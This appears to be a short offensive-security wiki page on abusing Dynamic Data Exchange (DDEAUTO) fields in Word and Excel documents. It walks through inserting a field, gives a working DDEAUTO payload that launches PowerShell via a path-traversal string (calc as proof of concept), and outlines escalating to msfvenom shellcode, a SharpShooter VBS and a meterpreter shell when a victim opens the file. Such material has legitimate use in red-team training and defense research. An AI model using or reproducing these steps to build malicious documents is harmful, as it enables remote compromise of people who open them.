⭕DDE Auto - Word/Excel
Intro
DDE is an old MS technology that is used to facilitate data transfer between applications. DDE sends messages between applications that share data and uses shared memory to exchange data between applications. DDE can be embedded in several Office file formats
To leverage this attack vector:
Open a new MS document and insert a field
It will add an "!Unexpected End of Formula" to the document, we right-click it and "Toggle field codes" :
We then replace the = * MERGEFORMAT with the payload: 1 { DDEAUTO "C:\Programs\Microsoft\Office\MSWord.exe\..\..\..\windows\system32\WindowsPowershell\v1.0\powershell.exe start calc # " "required"} Copied! If we save the document, reopen our document and accept the 2 prompts, calculator will popup.
This attack has been tested on the latest Windows10 LTSC edition with Microsoft Office 365 with up-to-date Windows Defender.
Requirements:
Enabled Dynamic Data Exchange Server Lookup
Enabled Dynamic Data Exchange Server Launch
Warning presented to the user who opens the worksheet:
Exploitation
generate msfvenom shellcode:
Create a malicious VBS script with SharpShooter with included raw3.txt shellcode file we generated earlier:
And inject the command to Microsoft Excel function:
After the user skips the warning we get a meterpreter shell:
Last updated
